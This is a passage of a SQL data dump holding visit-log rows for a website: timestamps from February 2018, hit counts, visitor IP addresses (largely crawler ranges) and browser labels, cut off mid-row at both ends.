8952487,1,1,0,0,'54.36.148.90','other'),(209608,1518952698,1,1,0,0,'54.36.149.84','other'),(209609,1518952866,1,1,0,0,'54.36.148.213','other'),(209610,1518953467,1,1,0,0,'54.36.148.137','other'),(209611,1518953931,1,1,0,0,'54.36.148.223','other'),(209612,1518954244,1,1,0,0,'54.36.149.11','other'),(209613,1518954395,1,1,0,0,'54.36.148.100','other'),(209614,1518954426,1,1,0,0,'54.36.148.12','other'),(209615,1518954588,1,1,0,0,'54.36.148.154','other'),(209616,1518954656,1,1,0,0,'91.209.11.236','other'),(209617,1518954925,10,10,0,0,'23.237.4.26','other'),(209618,1518955066,1,1,0,0,'54.36.149.89','other'),(209619,1518955099,1,1,0,0,'37.54.17.91','chrome'),(209620,1518955142,1,1,0,0,'54.36.148.124','other'),(209621,1518955213,1,1,0,0,'54.36.148.117','other'),(209622,1518955380,1,1,0,0,'54.36.148.136','other'),(209623,1518955549,1,1,0,0,'157.55.39.29','other'),(209624,1518955727,1,1,0,0,'54.36.149.4','other'),(209625,1518955812,2,0,2,0,'66.249.66.155',''),(209626,1518955840,1,1,0,0,'54.36.148.92','other'),(209627,1518955842,1,1,0,0,'54.36.148.20','other'),(209628,1518956102,1,1,0,0,'54.36.148.227','other'),(209629,1518956332,1,1,0,0,'54.36.149.21','other'),(209630,1518956726,1,1,0,0,'54.36.148.165','other'),(209631,1518956802,1,0,1,0,'66.249.66.157',''),(209632,1518956862,1,1,0,0,'54.36.149.8','other'),(209633,1518956943,1,1,0,0,'54.36.148.78','other'),(209634,1518956975,1,1,0,0,'217.69.133.245','other'),(209635,1518957048,1,1,0,0,'54.36.148.179','other'),(209636,1518957069,1,1,0,0,'54.36.148.116','other'),(209637,1518957132,1,1,0,0,'37.54.17.91','chrome'),(209638,1518957133,1,1,0,0,'54.36.148.134','other'),(209639,1518957682,1,1,0,0,'54.36.148.48','other'),(209640,1518957699,1,1,0,0,'54.36.149.90','other'),(209641,1518957770,1,0,1,0,'66.249.66.157',''),(209642,1518957814,1,1,0,0,'178.154.171.88','other'),(209643,1518958010,1,1,0,0,'54.36.149.57','other'),(209644,1518958066,1,1,0,0,'54.36.148.145','other'),(209645,1518958185,1,1,0,0,'54.36.148.254','other'),(209646,1518958288,1,1,0,0,'54.36.148.63','other'),(209647,1518958351,1,1,0,0,'217.69.133.238','other'),(209648,1518958357,1,1,0,0,'54.36.148.14','other'),(209649,1518958540,1,1,0,0,'54.36.148.72','other'),(209650,1518958690,1,1,0,0,'54.36.149.33','other'),(209651,1518959026,1,1,0,0,'8.29.198.26','other'),(209652,1518959053,1,1,0,0,'91.209.11.236','other'),(209653,1518959103,1,1,0,0,'54.36.149.18','other'),(209654,1518959134,1,1,0,0,'54.36.149.74','other'),(209655,1518959136,1,1,0,0,'54.36.148.94','other'),(209656,1518959163,1,1,0,0,'54.36.149.39','other'),(209657,1518959436,1,1,0,0,'193.106.30.99','firefox'),(209658,1518959594,1,1,0,0,'54.36.149.8','other'),(209659,1518959619,1,1,0,0,'54.36.148.50','other'),(209660,1518959924,1,1,0,0,'54.36.148.250','other'),(209661,1518960241,1,1,0,0,'54.36.148.247','other'),(209662,1518960500,1,1,0,0,'54.36.148.51','other'),(209663,1518960760,1,1,0,0,'54.36.149.7','other'),(209664,1518960779,1,1,0,0,'54.36.148.75','other'),(209665,1518960977,1,1,0,0,'54.36.149.87','other'),(209666,1518961072,1,1,0,0,'54.36.148.57','other'),(209667,1518961234,1,1,0,0,'54.36.148.190','other'),(209668,1518961252,1,1,0,0,'54.36.149.85','other'),(209669,1518961275,1,1,0,0,'54.36.148.67','other'),(209670,1518961326,1,1,0,0,'54.36.149.3','other'),(209671,1518961726,1,1,0,0,'54.36.148.63','other'),(209672,1518961970,1,1,0,0,'5.45.207.58','other'),(209673,1518962264,1,1,0,0,'54.36.148.224','other'),(209674,1518962333,3,3,0,0,'144.76.6.230','other'),(209675,1518962493,1,1,0,0,'54.36.149.104','other'),(209676,1518962510,1,1,0,0,'54.36.148.199','other'),(209677,1518962522,1,1,0,0,'157.55.39.152','other'),(209678,1518963113,1,1,0,0,'54.36.148.175','other'),(209679,1518963659,1,1,0,0,'54.36.149.81','other'),(209680,1518963682,1,1,0,0,'91.209.11.236','other'),(209681,1518963962,1,0,1,0,'66.249.66.155',''),(209682,1518964206,1,1,0,0,'54.36.148.204','other'),(209683,1518964295,1,0,1,0,'66.249.66.156',''),(209684,1518964329,1,1,0,0,'54.36.148.232','other'),(209685,1518964380,1,1,0,0,'54.36.148.58','other'),(209686,1518964452,1,1,0,0,'54.36.148.35','other'),(209687,1518964497,1,1,0,0,'54.36.148.186','other'),(209688,1518964676,1,1,0,0,'54.36.149.102','other'),(209689,1518964718,1,1,0,0,'54.36.148.238','other'),(209690,1518964766,1,1,0,0,'54.36.148.50','other'),(209691,1518964940,1,1,0,0,'54.36.148.244','other'),(209692,1518964966,1,1,0,0,'54.165.59.7','other'),(209693,1518965143,1,1,0,0,'54.36.149.58','other'),(209694,1518965273,1,1,0,0,'54.36.149.19','other'),(209695,1518965307,1,1,0,0,'54.36.149.14','other'),(209696,1518965972,1,1,0,0,'217.69.133.225','other'),(209697,1518966126,1,1,0,0,'178.154.171.81','other'),(209698,1518966128,1,1,0,0,'54.36.148.43','other'),(209699,1518966404,1,1,0,0,'54.36.148.37','other'),(209700,1518966498,1,1,0,0,'54.36.149.73','other'),(209701,1518966729,1,1,0,0,'54.36.148.149','other'),(209702,1518966950,1,1,0,0,'54.36.148.147','other'),(209703,1518966971,1,1,0,0,'54.36.148.194','other'),(209704,1518967014,1,1,0,0,'46.211.6.183','chrome'),(209705,1518967595,1,1,0,0,'54.36.148.205','other'),(209706,1518967603,1,1,0,0,'207.46.13.106','other'),(209707,1518967771,1,0,1,0,'66.249.66.76',''),(209708,1518968194,1,1,0,0,'54.36.148.142','other'),(209709,1518968277,1,1,0,0,'54.36.148.122','other'),(209710,1518968367,1,1,0,0,'54.36.148.38','other'),(209711,1518968642,1,1,0,0,'54.36.148.91','other'),(209712,1518968796,1,1,0,0,'54.36.148.83','other'),(209713,1518969008,1,1,0,0,'157.55.39.152','other'),(209714,1518969022,1,1,0,0,'157.55.39.29','other'),(209715,1518969087,1,1,0,0,'54.36.148.135','other'),(209716,1518969521,1,1,0,0,'54.36.148.183','other'),(209717,1518969560,1,1,0,0,'54.36.148.71','other'),(209718,1518969709,1,1,0,0,'54.36.148.58','other'),(209719,1518969735,1,1,0,0,'207.46.13.106','other'),(209720,1518969768,1,1,0,0,'54.36.148.245','other'),(209721,1518969793,1,1,0,0,'54.36.149.38','other'),(209722,1518969864,1,1,0,0,'8.29.198.26','other'),(209723,1518969976,1,1,0,0,'217.69.133.248','other'),(209724,1518970446,1,1,0,0,'54.36.148.72','other'),(209725,1518970473,1,1,0,0,'37.9.113.134','other'),(209726,1518970486,1,0,1,0,'66.249.66.157',''),(209727,1518970689,1,1,0,0,'54.36.148.231','other'),(209728,1518970734,1,1,0,0,'91.218.195.34','firefox'),(209729,1518970762,1,1,0,0,'54.36.149.7','other'),(209730,1518971096,1,1,0,0,'54.36.148.36','other'),(209731,1518971149,1,1,0,0,'54.36.148.166','other'),(209732,1518971461,1,1,0,0,'54.36.148.174','other'),(209733,1518971509,1,1,0,0,'54.36.149.91','other'),(209734,1518971828,1,1,0,0,'91.209.11.236','other'),(209735,1518971829,1,1,0,0,'54.36.149.20','other'),(209736,1518971895,1,1,0,0,'54.36.148.200','other'),(209737,1518972139,1,0,1,0,'66.249.66.156',''),(209738,1518972504,1,1,0,0,'54.36.148.70','other'),(209739,1518972649,1,1,0,0,'54.36.148.231','other'),(209740,1518972790,1,1,0,0,'54.36.149.20','other'),(209741,1518972845,1,1,0,0,'54.36.148.255','other'),(209742,1518973111,1,1,0,0,'54.36.148.89','other'),(209743,1518973193,1,1,0,0,'54.36.148.128','other'),(209744,1518973232,1,1,0,0,'54.36.149.37','other'),(209745,1518973410,1,1,0,0,'91.196.177.40','chrome'),(209746,1518973420,1,1,0,0,'37.9.113.182','other'),(209747,1518973523,1,1,0,0,'54.36.148.86','other'),(209748,1518973567,1,1,0,0,'54.36.149.34','other'),(209749,1518973609,1,1,0,0,'54.36.148.36','other'),(209750,1518973948,1,1,0,0,'54.36.148.156','other'),(209751,1518974358,1,1,0,0,'54.36.148.226','other'),(209752,1518974517,1,1,0,0,'54.36.148.84','other'),(209753,1518974531,1,1,0,0,'54.36.148.110','other'),(209754,1518974700,1,1,0,0,'54.36.148.169','other'),(209755,1518975047,1,1,0,0,'54.36.148.22','other'),(209756,1518975191,1,1,0,0,'54.36.148.83','other'),(209757,1518975306,1,1,0,0,'54.36.148.207','other'),(209758,1518975554,1,1,0,0,'54.36.149.10','other'),(209759,1518975592,1,1,0,0,'91.196.178.82','chrome'),(209760,1518975874,1,1,0,0,'54.36.149.11','other'),(209761,1518975902,1,1,0,0,'54.36.148.63','other'),(209762,1518975987,1,1,0,0,'54.36.148.28','other'),(209763,1518976184,1,1,0,0,'178.154.200.7','other'),(209764,1518976218,1,1,0,0,'54.36.149.33','other'),(209765,1518976345,1,1,0,0,'54.36.148.33','other'),(209766,1518976498,1,1,0,0,'54.36.149.52','other'),(209767,1518976794,1,1,0,0,'54.36.148.246','other'),(209768,1518976842,1,0,1,0,'66.249.66.75',''),(209769,1518976970,1,1,0,0,'54.36.148.153','other'),(209770,1518977397,1,1,0,0,'54.36.149.91','other'),(209771,1518977420,1,1,0,0,'54.36.148.69','other'),(209772,1518977689,1,1,0,0,'54.36.148.139','other'),(209773,1518978082,1,1,0,0,'54.36.149.23','other'),(209774,1518978707,1,1,0,0,'54.36.148.64','other'),(209775,1518978878,1,1,0,0,'54.36.149.5','other'),(209776,1518979009,1,1,0,0,'217.69.133.251','other'),(209777,1518979308,1,1,0,0,'54.36.148.59','other'),(209778,1518979368,1,1,0,0,'54.36.148.14','other'),(209779,1518979566,1,1,0,0,'54.36.148.178','other'),(209780,1518979702,1,1,0,0,'54.36.149.29','other'),(209781,1518979871,1,1,0,0,'162.210.196.130','other'),(209782,1518979896,1,1,0,0,'54.36.148.114','other'),(209783,1518980042,1,1,0,0,'54.36.148.197','other'),(209784,1518980171,1,1,0,0,'54.36.148.35','other'),(209785,1518980199,1,1,0,0,'54.36.148.50','other'),(209786,1518980694,1,1,0,0,'8.29.198.26','other'),(209787,1518980700,1,1,0,0,'54.36.148.185','other'),(209788,1518980715,1,1,0,0,'54.36.148.180','other'),(209789,1518980766,1,1,0,0,'54.36.148.232','other'),(209790,1518981454,1,1,0,0,'54.36.148.44','other'),(209791,1518981580,1,1,0,0,'54.36.149.42','other'),(209792,1518981608,1,1,0,0,'87.250.224.46','other'),(209793,1518981612,1,1,0,0,'141.8.132.19','other'),(209794,1518981764,1,1,0,0,'54.36.148.148','other'),(209795,1518982218,1,1,0,0,'54.36.148.206','other'),(209796,1518982224,1,1,0,0,'54.36.148.221','other'),(209797,1518982397,1,1,0,0,'54.36.148.120','other'),(209798,1518982536,1,1,0,0,'54.36.149.75','other'),(209799,1518982558,1,1,0,0,'54.36.148.104','other'),(209800,1518982669,1,1,0,0,'54.36.148.99','other'),(209801,1518982685,1,1,0,0,'54.36.149.56','other'),(209802,1518982690,1,1,0,0,'54.36.148.130','other'),(209803,1518982790,1,1,0,0,'66.249.66.76','chrome'),(209804,1518982837,1,1,0,0,'54.36.149.16','other'),(209805,1518983397,1,1,0,0,'91.196.178.162','chrome'),(209806,1518983422,1,1,0,0,'54.36.148.55','other'),(209807,1518983691,1,1,0,0,'91.209.11.236','other'),(209808,1518983894,1,1,0,0,'54.36.149.73','other'),(209809,1518983955,1,1,0,0,'54.36.148.29','other'),(209810,1518984042,1,1,0,0,'54.36.148.87','other'),(209811,1518984441,1,1,0,0,'54.36.148.205','other'),(209812,1518984542,1,1,0,0,'180.76.15.12','other'),(209813,1518984613,1,1,0,0,'54.36.149.40','other'),(209814,1518984819,1,1,0,0,'54.36.149.33','other'),(209815,1518984870,1,1,0,0,'66.249.66.155','chrome'),(209816,1518985022,1,1,0,0,'94.178.147.45','chrome'),(209817,1518985037,1,1,0,0,'54.36.149.94','other'),(209818,1518985303,1,1,0,0,'54.36.148.186','other'),(209819,1518985343,1,1,0,0,'54.36.148.174','other'),(209820,1518985452,1,1,0,0,'54.36.148.99','other'),(209821,1518985738,1,1,0,0,'54.36.149.63','other'),(209822,1518985866,1,1,0,0,'54.36.149.15','other'),(209823,1518986171,1,1,0,0,'54.36.148.139','other'),(209824,1518986317,1,1,0,0,'54.36.148.98','other'),(209825,1518986690,1,1,0,0,'54.36.148.106','other'),(209826,1518986786,1,1,0,0,'54.36.148.207','other'),(209827,1518986963,1,1,0,0,'188.130.176.3','chrome'),(209828,1518987870,1,1,0,0,'188.130.176.3','chrome'),(209829,1518988002,1,1,0,0,'54.36.149.101','other'),(209830,1518988316,1,1,0,0,'54.36.148.14','other'),(209831,1518988944,1,1,0,0,'54.36.149.37','other'),(209832,1518989072,1,1,0,0,'188.130.176.3','chrome'),(209833,1518989491,1,1,0,0,'180.76.15.32','other'),(209834,1518989802,1,1,0,0,'54.36.148.101','other'),(209835,1518989886,1,1,0,0,'54.36.149.106','other'),(209836,1518990016,1,1,0,0,'54.36.149.51','other'),(209837,1518990291,2,2,0,0,'54.36.148.175','other'),(209838,1518990341,1,1,0,0,'54.36.149.1','other'),(209839,1518990735,1,1,0,0,'54.36.148.36','other'),(209840,1518990793,1,1,0,0,'54.36.149.55','other'),(209841,1518990991,1,1,0,0,'54.36.148.30','other'),(209842,1518991174,1,1,0,0,'54.36.148.146','other'),(209843,1518991331,1,1,0,0,'157.55.39.152','other'),(209844,1518991457,1,1,0,0,'54.36.148.161','other'),(209845,1518991475,1,1,0,0,'54.36.148.229','other'),(209846,1518991482,1,1,0,0,'54.36.148.50','other'),(209847,1518991525,1,1,0,0,'8.29.198.25','other'),(209848,1518991671,1,1,0,0,'54.36.148.29','other'),(209849,1518991852,1,1,0,0,'54.36.149.61','other'),(209850,1518991934,1,1,0,0,'54.36.148.58','other'),(209851,1518992002,1,1,0,0,'54.36.148.162','other'),(209852,1518993070,1,1,0,0,'54.36.148.76','other'),(209853,1518993191,1,1,0,0,'213.180.203.8','other'),(209854,1518993386,1,1,0,0,'54.36.149.30','other'),(209855,1518993508,1,1,0,0,'54.36.148.11','other'),(209856,1518993942,1,1,0,0,'54.36.149.35','other'),(209857,1518993959,1,1,0,0,'54.36.148.40','other'),(209858,1518994313,1,1,0,0,'54.36.148.56','other'),(209859,1518994640,1,1,0,0,'54.36.148.231','other'),(209860,1518994885,1,1,0,0,'54.36.148.82','other'),(209861,1518995022,1,1,0,0,'54.36.149.57','other'),(209862,1518995213,1,1,0,0,'188.32.251.230','msie'),(209863,1518995214,1,1,0,0,'109.173.119.152','msie'),(209865,1518995356,1,1,0,0,'54.36.149.93','other'),(209866,1518995422,1,1,0,0,'91.209.11.236','other'),(209867,1518995486,1,1,0,0,'54.36.148.76','other'),(209868,1518995547,1,1,0,0,'54.36.149.84','other'),(209869,1518995632,1,1,0,0,'54.36.148.34','other'),(209870,1518995756,1,1,0,0,'54.36.148.87','other'),(209871,1518995772,1,1,0,0,'54.36.148.26','other'),(209872,1518995934,1,0,1,0,'66.249.66.156',''),(209873,1518996018,1,1,0,0,'54.36.148.35','other'),(209874,1518996170,1,1,0,0,'54.36.149.42','other'),(209875,1518996695,1,1,0,0,'54.36.148.188','other'),(209876,1518996717,1,1,0,0,'54.36.148.150','other'),(209877,1518996761,1,1,0,0,'157.55.39.152','other'),(209878,1518997137,1,1,0,0,'54.36.149.65','other'),(209879,1518997486,1,1,0,0,'54.36.148.20','other'),(209880,1518997875,1,1,0,0,'142.4.218.156','other'),(209881,1518997899,1,1,0,0,'142.4.218.156','chrome'),(209882,1518998370,1,1,0,0,'54.36.148.17','other'),(209883,1518998419,1,1,0,0,'54.36.148.126','other'),(209884,1518998425,1,1,0,0,'54.36.148.144','other'),(209885,1518998429,1,1,0,0,'54.36.149.48','other'),(209886,1518998485,2,2,0,0,'54.36.149.78','other'),(209887,1518998708,1,1,0,0,'54.36.149.23','other'),(209888,1518999235,1,1,0,0,'54.36.148.246','other'),(209889,1518999271,1,1,0,0,'217.69.133.28','other'),(209890,1518999800,1,1,0,0,'54.36.149.92','other'),(209891,1518999807,1,1,0,0,'54.36.148.47','other'),(209892,1518999905,1,1,0,0,'217.69.133.225','other'),(209893,1519000393,1,1,0,0,'54.36.148.94','other'),(209894,1519000869,1,1,0,0,'54.36.149.58','other'),(209895,1519001095,1,1,0,0,'54.36.148.237','other'),(209896,1519001194,1,1,0,0,'217.69.133.221','other'),(209897,1519001419,1,1,0,0,'54.36.148.241','other'),(209898,1519001965,1,1,0,0,'54.36.148.35','other'),(209899,1519002023,1,1,0,0,'54.36.148.69','other'),(209900,1519002316,1,1,0,0,'54.36.148.157','other'),(209901,1519002365,1,1,0,0,'8.29.198.27','other'),(209902,1519002448,1,1,0,0,'54.36.148.141','other'),(209903,1519002629,1,1,0,0,'54.36.148.204','other'),(209904,1519002630,1,1,0,0,'217.69.133.29','other'),(209905,1519002740,1,1,0,0,'54.36.148.253','other'),(209906,1519002772,1,1,0,0,'54.36.148.203','other'),(209907,1519002825,1,1,0,0,'54.36.149.72','other'),(209908,1519002929,1,1,0,0,'54.36.148.243','other'),(209909,1519002941,1,1,0,0,'54.36.149.40','other'),(209910,1519003037,1,1,0,0,'54.36.148.126','other'),(209911,1519003100,1,1,0,0,'54.36.149.49','other'),(209912,1519003329,1,1,0,0,'54.36.149.5','other'),(209913,1519003364,1,1,0,0,'54.36.148.147','other'),(209914,1519003402,1,1,0,0,'54.36.149.87','other'),(209915,1519003726,1,1,0,0,'54.36.148.161','other'),(209916,1519003729,1,1,0,0,'54.36.148.91','other'),(209917,1519003812,1,0,1,0,'66.249.66.156',''),(209918,1519003859,1,1,0,0,'54.36.148.222','other'),(209919,1519004487,1,1,0,0,'162.210.196.130','other'),(209920,1519004529,1,1,0,0,'54.36.148.27','other'),(209921,1519005097,1,1,0,0,'54.36.148.22','other'),(209922,1519005133,1,1,0,0,'54.36.148.159','other'),(209923,1519005746,1,1,0,0,'54.36.149.86','other'),(209924,1519005866,1,1,0,0,'54.36.149.36','other'),(209925,1519006016,1,1,0,0,'54.36.148.207','other'),(209926,1519006026,1,1,0,0,'54.36.148.245','other'),(209927,1519006141,1,1,0,0,'109.86.71.21','chrome'),(209928,1519006794,1,1,0,0,'13.56.229.65','chrome'),(209929,1519006796,1,1,0,0,'54.36.148.49','other'),(209930,1519006847,1,1,0,0,'54.36.148.127','other'),(209931,1519007046,1,1,0,0,'54.36.148.223','other'),(209932,1519007083,1,1,0,0,'54.36.148.76','other'),(209933,1519007274,1,1,0,0,'54.36.149.33','other'),(209934,1519007606,1,1,0,0,'5.45.207.82','other'),(209935,1519007921,1,1,0,0,'54.36.148.186','other'),(209936,1519008130,1,1,0,0,'54.36.149.82','other'),(209937,1519008136,1,1,0,0,'54.36.148.231','other'),(209938,1519008330,1,1,0,0,'54.36.148.115','other'),(209939,1519008335,1,1,0,0,'54.36.148.235','other'),(209940,1519008607,1,1,0,0,'54.36.149.8','other'),(209941,1519008763,1,0,1,0,'66.249.66.157',''),(209942,1519008767,1,1,0,0,'54.36.148.62','other'),(209943,1519008871,1,1,0,0,'54.36.149.80','other'),(209944,1519009213,1,1,0,0,'54.36.148.66','other'),(209945,1519009276,2,0,2,0,'66.249.66.155',''),(209946,1519009592,1,1,0,0,'54.36.148.206','other'),(209947,1519009958,1,1,0,0,'217.69.133.70','other'),(209948,1519010291,1,1,0,0,'54.36.148.231','other'),(209949,1519010644,1,1,0,0,'54.36.148.241','other'),(209950,1519011012,1,1,0,0,'54.36.148.168','other'),(209951,1519011071,1,1,0,0,'54.36.148.54','other'),(209952,1519011093,1,1,0,0,'54.36.148.140','other'),(209953,1519011102,1,1,0,0,'54.36.149.99','other'),(209954,1519011168,1,1,0,0,'141.8.132.22','other'),(209955,1519011318,1,1,0,0,'178.154.171.55','other'),(209956,1519011361,1,1,0,0,'54.36.148.51','other'),(209957,1519011505,1,1,0,0,'54.36.148.196','other'),(209958,1519011564,1,1,0,0,'54.36.148.27','other'),(209959,1519011565,1,1,0,0,'54.36.148.99','other'),(209960,1519011636,1,1,0,0,'54.36.148.149','other'),(209961,1519011706,1,1,0,0,'54.36.149.70','other'),(209962,1519012167,1,1,0,0,'54.36.149.20','other'),(209963,1519012194,1,1,0,0,'54.36.148.127','other'),(209964,1519012473,2,2,0,0,'54.36.149.11','other'),(209965,1519012485,1,1,0,0,'54.36.148.137','other'),(209966,1519012592,1,1,0,0,'54.36.149.103','other'),(209967,1519012809,1,0,1,0,'66.249.66.76',''),(209968,1519013051,1,1,0,0,'54.36.148.86','other'),(209969,1519013190,1,1,0,0,'8.29.198.25','other'),(209970,1519013408,1,1,0,0,'54.36.149.88','other'),(209971,1519014143,1,1,0,0,'54.36.148.228','other'),(209972,1519014452,1,1,0,0,'54.36.148.81','other'),(209973,1519014516,1,1,0,0,'54.36.148.244','other'),(209974,1519014535,1,1,0,0,'54.36.149.38','other'),(209975,1519014554,1,1,0,0,'54.36.149.97','other'),(209976,1519014606,1,1,0,0,'54.36.148.28','other'),(209977,1519014652,1,1,0,0,'54.36.148.178','other'),(209978,1519014691,1,1,0,0,'107.167.105.232','other'),(209979,1519014824,1,1,0,0,'54.36.148.34','other'),(209980,1519014858,1,1,0,0,'54.36.149.10','other'),(209981,1519015267,1,1,0,0,'54.36.148.243','other'),(209982,1519015819,1,1,0,0,'54.36.148.81','other'),(209983,1519015972,1,1,0,0,'54.36.148.148','other'),(209984,1519016071,1,1,0,0,'54.36.148.133','other'),(209985,1519016077,1,1,0,0,'54.36.149.51','other'),(209986,1519016151,1,1,0,0,'54.36.148.184','other'),(209987,1519016339,1,1,0,0,'178.154.171.60','other'),(209988,1519016460,1,1,0,0,'157.55.39.29','other'),(209989,1519016484,1,1,0,0,'54.36.148.59','other'),(209990,1519016574,1,1,0,0,'54.36.148.135','other'),(209991,1519016757,1,1,0,0,'54.36.148.185','other'),(209992,1519016790,1,1,0,0,'217.69.133.231','other'),(209993,1519016883,1,1,0,0,'54.36.148.183','other'),(209994,1519017019,1,1,0,0,'91.209.11.236','other'),(209995,1519017038,1,1,0,0,'54.36.148.72','other'),(209996,1519017118,1,1,0,0,'54.36.148.163','other'),(209997,1519017131,1,1,0,0,'54.36.148.246','other'),(209998,1519017546,1,0,1,0,'66.249.66.155',''),(209999,1519017826,1,1,0,0,'54.36.149.94','other'),(210000,1519018083,1,1,0,0,'54.36.149.51','other'),(210001,1519018196,1,1,0,0,'54.36.148.75','other'),(210002,1519019017,1,1,0,0,'188.255.21.5','msie'),(210003,1519019169,1,1,0,0,'207.46.13.30','other'),(210004,1519019208,1,1,0,0,'95.221.253.215','msie'),(210005,1519019232,1,1,0,0,'54.36.148.211','other'),(210006,1519019571,1,1,0,0,'54.36.148.217','other'),(210007,1519019690,1,1,0,0,'54.36.148.253','other'),(210008,1519019706,1,1,0,0,'54.36.149.15','other'),(210009,1519019880,1,1,0,0,'54.36.148.161','other'),(210010,1519019908,1,1,0,0,'217.69.133.10','other'),(210011,1519020303,1,1,0,0,'54.36.149.13','other'),(210012,1519020347,1,1,0,0,'54.36.148.73','other'),(210013,1519020685,1,1,0,0,'54.36.149.81','other'),(210014,1519021176,1,1,0,0,'54.36.148.199','other'),(210015,1519021303,1,1,0,0,'37.9.113.182','other'),(210016,1519021331,1,1,0,0,'54.36.149.66','other'),(210017,1519021455,1,1,0,0,'54.36.148.69','other'),(210018,1519021513,1,1,0,0,'54.36.148.174','other'),(210019,1519021565,2,2,0,0,'92.112.125.243','chrome'),(210020,1519021782,1,1,0,0,'54.36.149.103','other'),(210021,1519021831,1,1,0,0,'54.36.148.161','other'),(210022,1519022105,1,1,0,0,'54.36.148.221','other'),(210023,1519022273,1,1,0,0,'54.36.148.198','other'),(210024,1519022358,1,1,0,0,'54.36.148.80','other'),(210025,1519022624,1,1,0,0,'54.36.148.90','other'),(210026,1519022916,1,1,0,0,'54.36.148.222','other'),(210027,1519023082,1,1,0,0,'54.36.149.55','other'),(210028,1519023321,1,1,0,0,'54.36.149.86','other'),(210029,1519023396,1,1,0,0,'54.36.148.38','other'),(210030,1519023556,1,1,0,0,'54.36.148.184','other'),(210031,1519023600,1,1,0,0,'54.36.148.50','other'),(210032,1519023633,1,1,0,0,'54.36.149.53','other'),(210033,1519023639,1,1,0,0,'54.36.148.149','other'),(210034,1519023703,1,1,0,0,'180.76.15.10','other'),(210035,1519023734,1,1,0,0,'54.36.148.64','other'),(210036,1519023790,1,1,0,0,'91.196.177.110','chrome'),(210037,1519023984,1,1,0,0,'54.36.148.89','other'),(210038,1519024022,1,1,0,0,'8.29.198.27','other'),(210039,1519024491,1,1,0,0,'62.140.224.1','chrome'),(210040,1519024536,1,1,0,0,'54.36.148.167','other'),(210041,1519024727,1,0,1,0,'66.249.66.155',''),(210042,1519024729,2,2,0,0,'91.196.178.83','chrome'),(210043,1519024833,1,1,0,0,'217.69.133.191','other'),(210044,1519024863,1,1,0,0,'54.36.149.1','other'),(210045,1519024914,1,1,0,0,'54.36.148.142','other'),(210046,1519024916,1,1,0,0,'54.36.148.178','other'),(210047,1519025075,2,2,0,0,'195.230.119.34','chrome'),(210048,1519025096,1,1,0,0,'178.92.186.29','chrome'),(210049,1519025188,1,1,0,0,'141.8.132.22','other'),(210050,1519025414,1,1,0,0,'91.196.178.169','chrome'),(210051,1519025679,1,1,0,0,'54.36.148.207','other'),(210052,1519025848,1,1,0,0,'95.133.58.97','chrome'),(210053,1519025897,1,1,0,0,'54.36.149.67','other'),(210054,1519026078,1,1,0,0,'54.36.148.131','other'),(210055,1519026170,1,1,0,0,'54.36.148.105','other'),(210056,1519026379,1,1,0,0,'54.36.148.238','other'),(210057,1519026461,1,1,0,0,'95.132.52.124','chrome'),(210058,1519026467,1,0,1,0,'66.249.66.156',''),(210059,1519026775,1,1,0,0,'207.46.13.60','other'),(210060,1519026974,1,1,0,0,'54.36.148.232','other'),(210061,1519027063,1,1,0,0,'94.153.173.214','firefox'),(210062,1519027124,1,1,0,0,'54.36.148.118','other'),(210063,1519027192,1,1,0,0,'54.36.148.89','other'),(210064,1519027402,1,1,0,0,'54.36.149.70','other'),(210065,1519027523,1,1,0,0,'54.36.148.27','other'),(210066,1519027625,1,1,0,0,'91.196.178.166','chrome'),(210067,1519027858,1,1,0,0,'54.36.148.44','other'),(210068,1519028236,1,1,0,0,'217.69.133.227','other'),(210069,1519028243,1,1,0,0,'54.36.148.19','other'),(210070,1519028332,1,1,0,0,'54.36.148.128','other'),(210071,1519028376,1,1,0,0,'54.36.148.174','other'),(210072,1519028799,1,1,0,0,'54.36.149.105','other'),(210073,1519028846,1,1,0,0,'54.36.148.31','other'),(210074,1519028999,3,3,0,0,'91.196.178.80','chrome'),(210075,1519029002,1,1,0,0,'178.93.198.231','firefox'),(210076,1519029325,1,1,0,0,'54.36.148.161','other'),(210077,1519029408,1,1,0,0,'91.196.178.161','chrome'),(210078,1519029479,1,1,0,0,'54.36.148.239','other'),(210079,1519029692,1,1,0,0,'54.36.148.103','other'),(210080,1519029809,1,1,0,0,'54.36.148.191','other'),(210081,1519029818,1,1,0,0,'54.36.148.47','other'),(210082,1519029865,1,1,0,0,'54.36.148.193','other'),(210083,1519030052,1,1,0,0,'95.132.44.40','firefox'),(210084,1519030093,1,1,0,0,'54.36.148.238','other'),(210085,1519030231,1,1,0,0,'54.36.148.82','other'),(210086,1519030242,1,1,0,0,'54.36.149.34','other'),(210087,1519030423,1,1,0,0,'54.36.148.99','other'),(210088,1519030962,1,1,0,0,'54.36.148.208','other'),(210089,1519030992,1,1,0,0,'157.55.39.29','other'),(210090,1519030993,1,1,0,0,'94.179.230.81','chrome'),(210091,1519031268,1,1,0,0,'91.124.114.197','firefox'),(210092,1519031401,2,0,2,0,'66.249.66.156',''),(210093,1519031490,1,1,0,0,'178.251.107.255','chrome'),(210094,1519031816,1,1,0,0,'54.36.148.63','other'),(210095,1519031841,2,2,0,0,'37.53.90.175','chrome'),(210096,1519031861,1,1,0,0,'54.36.148.35','other'),(210097,1519031938,1,1,0,0,'54.36.148.202','other'),(210098,1519032024,2,2,0,0,'91.196.178.52','chrome'),(210099,1519032032,1,1,0,0,'92.112.125.243','chrome'),(210100,1519032101,1,1,0,0,'54.36.148.118','other'),(210101,1519032224,1,1,0,0,'91.196.178.166','chrome'),(210102,1519032256,1,1,0,0,'207.46.13.106','other'),(210103,1519032414,1,1,0,0,'54.36.148.78','other'),(210104,1519032634,1,1,0,0,'54.36.148.249','other'),(210105,1519032805,1,1,0,0,'54.36.148.34','other'),(210106,1519032993,1,1,0,0,'54.36.148.73','other'),(210107,1519033009,1,1,0,0,'54.36.148.180','other'),(210108,1519033194,1,1,0,0,'178.154.171.55','other'),(210109,1519033335,1,1,0,0,'54.36.148.200','other'),(210110,1519033530,1,1,0,0,'54.36.149.74','other'),(210111,1519033919,1,1,0,0,'54.36.148.145','other'),(210112,1519034077,1,1,0,0,'54.36.149.70','other'),(210113,1519034114,1,1,0,0,'54.36.149.24','other'),(210114,1519034261,1,1,0,0,'54.36.148.247','other'),(210115,1519034509,2,2,0,0,'91.196.178.167','chrome'),(210116,1519034528,1,1,0,0,'54.36.148.227','other'),(210117,1519034867,1,1,0,0,'8.29.198.25','other'),(210118,1519034912,2,2,0,0,'212.113.43.239','chrome'),(210119,1519035050,1,1,0,0,'54.36.148.197','other'),(210120,1519035178,1,1,0,0,'54.36.148.78','other'),(210121,1519035455,1,1,0,0,'54.36.148.177','other'),(210122,1519035616,1,1,0,0,'54.36.148.138','other'),(21